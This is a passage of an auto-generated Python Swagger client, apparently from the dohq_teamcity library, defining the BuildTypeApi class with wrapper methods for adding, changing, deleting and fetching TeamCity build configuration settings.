from dohq_teamcity.models.branches import Branches # noqa: F401,E501
from dohq_teamcity.models.build import Build # noqa: F401,E501
from dohq_teamcity.models.build_type import BuildType # noqa: F401,E501
from dohq_teamcity.models.build_types import BuildTypes # noqa: F401,E501
from dohq_teamcity.models.builds import Builds # noqa: F401,E501
from dohq_teamcity.models.feature import Feature # noqa: F401,E501
from dohq_teamcity.models.features import Features # noqa: F401,E501
from dohq_teamcity.models.file import File # noqa: F401,E501
from dohq_teamcity.models.files import Files # noqa: F401,E501
from dohq_teamcity.models.investigations import Investigations # noqa: F401,E501
from dohq_teamcity.models.items import Items # noqa: F401,E501
from dohq_teamcity.models.model_property import ModelProperty # noqa: F401,E501
from dohq_teamcity.models.new_build_type_description import NewBuildTypeDescription # noqa: F401,E501
from dohq_teamcity.models.properties import Properties # noqa: F401,E501
from dohq_teamcity.models.snapshot_dependencies import SnapshotDependencies # noqa: F401,E501
from dohq_teamcity.models.snapshot_dependency import SnapshotDependency # noqa: F401,E501
from dohq_teamcity.models.step import Step # noqa: F401,E501
from dohq_teamcity.models.steps import Steps # noqa: F401,E501
from dohq_teamcity.models.tags import Tags # noqa: F401,E501
from dohq_teamcity.models.trigger import Trigger # noqa: F401,E501
from dohq_teamcity.models.triggers import Triggers # noqa: F401,E501
from dohq_teamcity.models.type import Type # noqa: F401,E501
from dohq_teamcity.models.vcs_labeling import VcsLabeling # noqa: F401,E501
from dohq_teamcity.models.vcs_root_entries import VcsRootEntries # noqa: F401,E501
from dohq_teamcity.models.vcs_root_entry import VcsRootEntry # noqa: F401,E501
from dohq_teamcity.models.vcs_root_instances import VcsRootInstances # noqa: F401,E501
class BuildTypeApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
base_name = 'BuildType'
def __init__(self, api_client=None):
self.api_client = api_client
def add_agent_requirement(self, bt_locator, **kwargs): # noqa: E501
"""add_agent_requirement # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_agent_requirement(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param AgentRequirement body:
:return: AgentRequirement
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_agent_requirement_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_agent_requirement_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_artifact_dep(self, bt_locator, **kwargs): # noqa: E501
"""add_artifact_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_artifact_dep(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param ArtifactDependency body:
:return: ArtifactDependency
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_artifact_dep_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_artifact_dep_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_build_type(self, **kwargs): # noqa: E501
"""add_build_type # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_build_type(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param BuildType body:
:param str fields:
:return: BuildType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_build_type_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.__add_build_type_with_http_info(**kwargs) # noqa: E501
return data
def add_feature(self, bt_locator, **kwargs): # noqa: E501
"""add_feature # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_feature(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param Feature body:
:return: Feature
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_feature_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_feature_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_feature_parameter(self, bt_locator, feature_id, parameter_name, **kwargs): # noqa: E501
"""add_feature_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_feature_parameter(bt_locator, feature_id, parameter_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str parameter_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_feature_parameter_with_http_info(bt_locator, feature_id, parameter_name, **kwargs) # noqa: E501
else:
(data) = self.__add_feature_parameter_with_http_info(bt_locator, feature_id, parameter_name, **kwargs) # noqa: E501
return data
def add_snapshot_dep(self, bt_locator, **kwargs): # noqa: E501
"""add_snapshot_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_snapshot_dep(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param SnapshotDependency body:
:return: SnapshotDependency
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_snapshot_dep_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_snapshot_dep_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_step(self, bt_locator, **kwargs): # noqa: E501
"""add_step # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_step(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param Step body:
:return: Step
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_step_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_step_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_step_parameter(self, bt_locator, step_id, parameter_name, **kwargs): # noqa: E501
"""add_step_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_step_parameter(bt_locator, step_id, parameter_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str parameter_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_step_parameter_with_http_info(bt_locator, step_id, parameter_name, **kwargs) # noqa: E501
else:
(data) = self.__add_step_parameter_with_http_info(bt_locator, step_id, parameter_name, **kwargs) # noqa: E501
return data
def add_template(self, bt_locator, **kwargs): # noqa: E501
"""add_template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_template(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param BuildType body:
:param bool optimize_settings:
:param str fields:
:return: BuildType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_template_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_template_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_trigger(self, bt_locator, **kwargs): # noqa: E501
"""add_trigger # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_trigger(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param Trigger body:
:return: Trigger
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_trigger_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_trigger_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def add_vcs_root_entry(self, bt_locator, **kwargs): # noqa: E501
"""add_vcs_root_entry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_vcs_root_entry(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param VcsRootEntry body:
:param str fields:
:return: VcsRootEntry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_vcs_root_entry_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__add_vcs_root_entry_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def change_artifact_dep_setting(self, bt_locator, artifact_dep_locator, field_name, **kwargs): # noqa: E501
"""change_artifact_dep_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.change_artifact_dep_setting(bt_locator, artifact_dep_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:param str field_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__change_artifact_dep_setting_with_http_info(bt_locator, artifact_dep_locator, field_name, **kwargs) # noqa: E501
else:
(data) = self.__change_artifact_dep_setting_with_http_info(bt_locator, artifact_dep_locator, field_name, **kwargs) # noqa: E501
return data
def change_feature_setting(self, bt_locator, feature_id, name, **kwargs): # noqa: E501
"""change_feature_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.change_feature_setting(bt_locator, feature_id, name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__change_feature_setting_with_http_info(bt_locator, feature_id, name, **kwargs) # noqa: E501
else:
(data) = self.__change_feature_setting_with_http_info(bt_locator, feature_id, name, **kwargs) # noqa: E501
return data
def change_requirement_setting(self, bt_locator, agent_requirement_locator, field_name, **kwargs): # noqa: E501
"""change_requirement_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.change_requirement_setting(bt_locator, agent_requirement_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:param str field_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__change_requirement_setting_with_http_info(bt_locator, agent_requirement_locator, field_name, **kwargs) # noqa: E501
else:
(data) = self.__change_requirement_setting_with_http_info(bt_locator, agent_requirement_locator, field_name, **kwargs) # noqa: E501
return data
def change_step_setting(self, bt_locator, step_id, field_name, **kwargs): # noqa: E501
"""change_step_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.change_step_setting(bt_locator, step_id, field_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str field_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__change_step_setting_with_http_info(bt_locator, step_id, field_name, **kwargs) # noqa: E501
else:
(data) = self.__change_step_setting_with_http_info(bt_locator, step_id, field_name, **kwargs) # noqa: E501
return data
def change_trigger_setting(self, bt_locator, trigger_locator, field_name, **kwargs): # noqa: E501
"""change_trigger_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.change_trigger_setting(bt_locator, trigger_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:param str field_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__change_trigger_setting_with_http_info(bt_locator, trigger_locator, field_name, **kwargs) # noqa: E501
else:
(data) = self.__change_trigger_setting_with_http_info(bt_locator, trigger_locator, field_name, **kwargs) # noqa: E501
return data
def delete_agent_requirement(self, bt_locator, agent_requirement_locator, **kwargs): # noqa: E501
"""delete_agent_requirement # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_agent_requirement(bt_locator, agent_requirement_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, **kwargs) # noqa: E501
return data
def delete_all_parameters(self, bt_locator, **kwargs): # noqa: E501
"""delete_all_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_all_parameters(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_all_parameters_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_all_parameters_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def delete_all_parameters_0(self, bt_locator, **kwargs): # noqa: E501
"""delete_all_parameters_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_all_parameters_0(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_all_parameters_0_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_all_parameters_0_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def delete_artifact_dep(self, bt_locator, artifact_dep_locator, **kwargs): # noqa: E501
"""delete_artifact_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_artifact_dep(bt_locator, artifact_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, **kwargs) # noqa: E501
return data
def delete_build_type(self, bt_locator, **kwargs): # noqa: E501
"""delete_build_type # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_build_type(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_build_type_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_build_type_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def delete_feature(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""delete_feature # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_feature(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str feature_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_feature_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
else:
(data) = self.__delete_feature_with_http_info(bt_locator, feature_id, **kwargs) # noqa: E501
return data
def delete_parameter(self, name, bt_locator, **kwargs): # noqa: E501
"""delete_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_parameter(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_parameter_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_parameter_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def delete_parameter_0(self, name, bt_locator, **kwargs): # noqa: E501
"""delete_parameter_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_parameter_0(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_parameter_0_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_parameter_0_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def delete_snapshot_dep(self, bt_locator, snapshot_dep_locator, **kwargs): # noqa: E501
"""delete_snapshot_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_dep(bt_locator, snapshot_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str snapshot_dep_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, **kwargs) # noqa: E501
return data
def delete_step(self, bt_locator, step_id, **kwargs): # noqa: E501
"""delete_step # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_step(bt_locator, step_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str step_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_step_with_http_info(bt_locator, step_id, **kwargs) # noqa: E501
else:
(data) = self.__delete_step_with_http_info(bt_locator, step_id, **kwargs) # noqa: E501
return data
def delete_trigger(self, bt_locator, trigger_locator, **kwargs): # noqa: E501
"""delete_trigger # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_trigger(bt_locator, trigger_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_trigger_with_http_info(bt_locator, trigger_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_trigger_with_http_info(bt_locator, trigger_locator, **kwargs) # noqa: E501
return data
def delete_vcs_root_entry(self, bt_locator, vcs_root_locator, **kwargs): # noqa: E501
"""delete_vcs_root_entry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_vcs_root_entry(bt_locator, vcs_root_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str vcs_root_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, **kwargs) # noqa: E501
else:
(data) = self.__delete_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, **kwargs) # noqa: E501
return data
def get_agent_requirement(self, bt_locator, agent_requirement_locator, **kwargs): # noqa: E501
"""get_agent_requirement # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_agent_requirement(bt_locator, agent_requirement_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:param str fields:
:return: AgentRequirement
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, **kwargs) # noqa: E501
return data
def get_agent_requirements(self, bt_locator, **kwargs): # noqa: E501
"""get_agent_requirements # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_agent_requirements(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: AgentRequirements
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_agent_requirements_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_agent_requirements_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_aliases(self, bt_locator, field, **kwargs): # noqa: E501
"""get_aliases # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_aliases(bt_locator, field, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str field: (required)
:return: Items
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_aliases_with_http_info(bt_locator, field, **kwargs) # noqa: E501
else:
(data) = self.__get_aliases_with_http_info(bt_locator, field, **kwargs) # noqa: E501
return data
def get_artifact_dep(self, bt_locator, artifact_dep_locator, **kwargs): # noqa: E501
"""get_artifact_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_artifact_dep(bt_locator, artifact_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:param str fields:
:return: ArtifactDependency
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, **kwargs) # noqa: E501
return data
def get_artifact_dep_setting(self, bt_locator, artifact_dep_locator, field_name, **kwargs): # noqa: E501
"""get_artifact_dep_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_artifact_dep_setting(bt_locator, artifact_dep_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:param str field_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_artifact_dep_setting_with_http_info(bt_locator, artifact_dep_locator, field_name, **kwargs) # noqa: E501
else:
(data) = self.__get_artifact_dep_setting_with_http_info(bt_locator, artifact_dep_locator, field_name, **kwargs) # noqa: E501
return data
def get_artifact_deps(self, bt_locator, **kwargs): # noqa: E501
"""get_artifact_deps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_artifact_deps(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: ArtifactDependencies
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_artifact_deps_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_artifact_deps_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_build_types(self, **kwargs): # noqa: E501
"""get_build_types # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_build_types(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str locator:
:param str fields:
:return: BuildTypes
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_build_types_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.__get_build_types_with_http_info(**kwargs) # noqa: E501
return data
def get_children(self, path, bt_locator, **kwargs): # noqa: E501
"""get_children # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_children(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str bt_locator: (required)
:param str base_path:
:param str locator:
:param str fields:
:param bool resolve_parameters:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_children_with_http_info(path, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_children_with_http_info(path, bt_locator, **kwargs) # noqa: E501
return data
def get_children_alias(self, path, bt_locator, **kwargs): # noqa: E501
"""get_children_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_children_alias(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str bt_locator: (required)
:param str base_path:
:param str locator:
:param str fields:
:param bool resolve_parameters:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_children_alias_with_http_info(path, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_children_alias_with_http_info(path, bt_locator, **kwargs) # noqa: E501
return data
def get_content(self, path, bt_locator, **kwargs): # noqa: E501
"""get_content # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_content(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str bt_locator: (required)
:param str response_builder:
:param bool resolve_parameters:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_content_with_http_info(path, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_content_with_http_info(path, bt_locator, **kwargs) # noqa: E501
return data
def get_content_alias(self, path, bt_locator, **kwargs): # noqa: E501
"""get_content_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_content_alias(path, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str bt_locator: (required)
:param bool resolve_parameters:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_content_alias_with_http_info(path, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_content_alias_with_http_info(path, bt_locator, **kwargs) # noqa: E501
return data
def get_current_vcs_instances(self, bt_locator, **kwargs): # noqa: E501
"""get_current_vcs_instances # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_current_vcs_instances(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: VcsRootInstances
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_current_vcs_instances_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_current_vcs_instances_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_current_vcs_instances_obsolete(self, bt_locator, **kwargs): # noqa: E501
"""get_current_vcs_instances_obsolete # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_current_vcs_instances_obsolete(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: VcsRootInstances
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_current_vcs_instances_obsolete_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_current_vcs_instances_obsolete_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_example_new_project_description(self, bt_locator, **kwargs): # noqa: E501
"""get_example_new_project_description # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_example_new_project_description(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:return: NewBuildTypeDescription
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_example_new_project_description_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__get_example_new_project_description_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def get_example_new_project_description_compatibility_version1(self, bt_locator, **kwargs): # noqa: E501
